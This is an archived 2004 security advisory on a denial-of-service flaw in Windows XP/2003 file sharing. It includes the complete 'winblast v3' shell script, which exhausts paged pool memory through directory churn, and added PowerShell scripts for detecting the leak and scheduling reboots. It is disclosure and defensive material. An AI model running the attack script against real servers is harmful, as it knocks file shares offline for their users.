- Announced: 2004-02-02
- Type: Denial of Service Attack on Windows
- Impact: smbmount can stop Windows from sharing files
- Writer: Daniel Kabs, Germany (daniel.kabs@gmx.de)
- Credits: Thanks to Steve Ladjabi (steve.ladjabi@web.de)
-
- Contents:
- 1. Abstract
- 2. Affected Systems
- 3. Attack Setup
- 4. Symptoms
- 5. Workaround
-
-
- 1. Abstract
-
- A security vulnerability in "Windows XP" and "Windows 2003
- Server" has been found. These systems are open to a denial
- of service attack. If they share folders to a Unix client
- that mounts them with smbmount (part of the Samba suite),
- any user on the client who has permission to create
- directories on the mounted share can stop the Windows
- system from serving files. The attack induces a memory
- shortage on the Windows system by repeatedly creating and
- deleting directories in a particular way.
-
- 2. Affected Systems
-
- This denial of service attack has been carried out
- successfully against
- - Microsoft Windows XP Professional, Service Pack 1
- - Microsoft Windows Server 2003
-
- Microsoft Windows 2000 Prof. and earlier versions of
- Windows are not affected by this attack.
-
- 3. Attack Setup
-
- The attack was carried out successfully using the
- following Unix clients:
- - "Debian Linux", smbmount 3.0.0beta2
- - "Suse Linux 8.2", smbmount version 2.2.2
-
- The Windows system shares a folder. The Unix client mounts
- the share using smbmount. A user on the Unix client has
- write/create permissions on the shared folder.
-
- The user on the client creates and deletes a lot of
- directories on the mounted share using the following
- script:
-
#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi

count=0

# using 'pathcount' directories
pathcount=1000

echo running \'winblast v3\' with $pathcount files in loop ...

while true; do
    p=$((pathcount*2-1))
    stop=$((pathcount-1))
    while [ "$p" != "$stop" ]; do
        dirname=wbst$p
        # delete old directory if it exists, exit on any error
        if [ -d "$dirname" ]; then
            rmdir "$dirname" || exit 3
        fi

        # generate the directory and exit on any error
        mkdir "$dirname" || exit 1
        p=$((p-1))
        count=$((count+1))
    done
    echo $count directories generated ...
done
#-- end --
-
- The script first creates 1000 directories and then
- repeatedly deletes and re-creates them, so there are never
- more than those 1000 directories at any time!
-
- Every time a directory is created, the Windows system
- allocates paged pool memory. This memory is not freed
- even after the directory is deleted.
-
- After 3.5 million directories have been created and
- deleted, the Windows system's paged pool memory is depleted
- and it denies access to the share. One tested Windows XP
- system survived 5.8 million directories before it stopped
- serving. This happens about 4 hours after the attack was
- started.
-
- 4. Symptoms
-
- When the Windows system fails, it suddenly stops serving,
- i.e. users can no longer access files or list directory
- contents from the client. Every client loses its access
- to the share.
-
- On the Windows system the event log shows an error with
- event id 2020.
-
- Additionally, the Administrator of the Windows system can
- neither unshare the folder nor kill the session, due to the
- lack of memory resources. Trying to open the management
- console results in error messages to this effect.
- Executing the command "net share /delete" fails due to
- the memory shortage.
-
- The only way to get the Windows system working again is
- to reboot it.
-
- Putting more RAM in the machine running Windows will not
- help, as the paged pool memory is limited to 343MB (see
- MS KB article Q312362).
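- The leak described in section 3 (paged pool growing with every
- directory created, never returned on deletion) and the symptoms
- above (event ID 2020, the share going dead) can both be watched
- for from the Windows side. The following script is an added
- example for this archived advisory, not part of the original
- text: it samples the Pool Paged Bytes counter twice, estimates
- how long a steady growth rate would take to reach the ceiling,
- and checks the System log for event ID 2020. It assumes Windows
- PowerShell 3.0 or later (Get-Counter, Get-WinEvent); the 343 MB
- ceiling is the advisory's figure and the 80% warning threshold is
- an arbitrary choice, both to be adjusted for the platform at hand.

```powershell
# Added example (not from the advisory): detect a paged-pool leak on the
# Windows file server before the share stops serving.
# Assumes Windows PowerShell 3.0 or later (Get-Counter, Get-WinEvent).

$CeilingMB      = 343   # paged-pool ceiling quoted in the advisory (KB Q312362)
$WarnPercent    = 80    # assumed alert threshold, not from the advisory
$SampleInterval = 60    # seconds between the two counter samples

# Two samples of Pool Paged Bytes, $SampleInterval seconds apart
$samples = Get-Counter -Counter '\Memory\Pool Paged Bytes' `
    -SampleInterval $SampleInterval -MaxSamples 2
$first = $samples[0].CounterSamples[0].CookedValue
$last  = $samples[1].CounterSamples[0].CookedValue

$usedMB  = [math]::Round($last / 1MB, 1)
$percent = [math]::Round(100 * $usedMB / $CeilingMB, 1)
Write-Output ("Pool Paged Bytes: {0} MB ({1}% of the {2} MB ceiling)" -f $usedMB, $percent, $CeilingMB)

# A steady positive growth rate while the share is busy is the leak signature;
# project when the ceiling would be reached at the observed rate
$bytesPerSec = ($last - $first) / $SampleInterval
if ($bytesPerSec -gt 0) {
    $hoursLeft = ($CeilingMB * 1MB - $last) / $bytesPerSec / 3600
    Write-Output ("Paged pool growing at {0:N0} bytes/s; ceiling reached in about {1:N1} h" -f $bytesPerSec, $hoursLeft)
}

if ($percent -ge $WarnPercent) {
    Write-Warning "Paged pool above $WarnPercent%; the share may stop serving soon"
}

# Event ID 2020 in the System log is the server's 'unable to allocate from
# the paged pool' message. Get-WinEvent throws when nothing matches, hence
# -ErrorAction SilentlyContinue.
$hits = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 2020 } `
    -MaxEvents 5 -ErrorAction SilentlyContinue
if ($hits) {
    Write-Warning "Event ID 2020 already logged; the server has hit the paged-pool limit"
    $hits | Select-Object TimeCreated, ProviderName, Message | Format-Table -AutoSize -Wrap
}
```

- A single pair of samples only shows the growth rate at that
- moment; run the script periodically (or lengthen the interval)
- on a server whose paged pool is normally flat, and treat a
- persistent upward trend as the thing to investigate, since the
- advisory reports the share dying roughly four hours after the
- churn began.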
-
- 5. Workaround
-
- Administrators should schedule a daily reboot of the
- Windows system.
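- The daily reboot recommended above can be registered as a
- scheduled task. The following is an added example, not part of
- the advisory: it uses schtasks.exe and shutdown.exe, both present
- on Windows XP and later, and must be run from an elevated prompt.
- The task name, the 03:00 run time and the two-minute grace period
- are arbitrary choices.

```powershell
# Added example (not from the advisory): register the daily reboot the
# advisory recommends as a scheduled task. Assumes schtasks.exe and
# shutdown.exe (Windows XP and later) and an elevated prompt.

$TaskName = 'DailyReboot-PagedPoolWorkaround'   # arbitrary name
$RebootAt = '03:00'                             # local time, outside working hours
$GraceSec = 120                                 # warning period before the reboot

# shutdown.exe /r reboots the machine; /t gives logged-on users a countdown
$command = "shutdown.exe /r /t $GraceSec"

# /SC DAILY /ST runs the command once a day at the given time; /RU SYSTEM
# runs it without a stored user password
schtasks.exe /Create /TN $TaskName /TR $command /SC DAILY /ST $RebootAt /RU SYSTEM
if ($LASTEXITCODE -ne 0) {
    throw "schtasks /Create failed with exit code $LASTEXITCODE"
}

# Confirm the task exists and show its next run time
schtasks.exe /Query /TN $TaskName /V /FO LIST
```

- Pick a time when no client is expected to hold files open on
- the share, since the reboot drops every SMB session; the task
- can be removed again with `schtasks.exe /Delete /TN <name> /F`
- once a patched Windows build is in place.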
-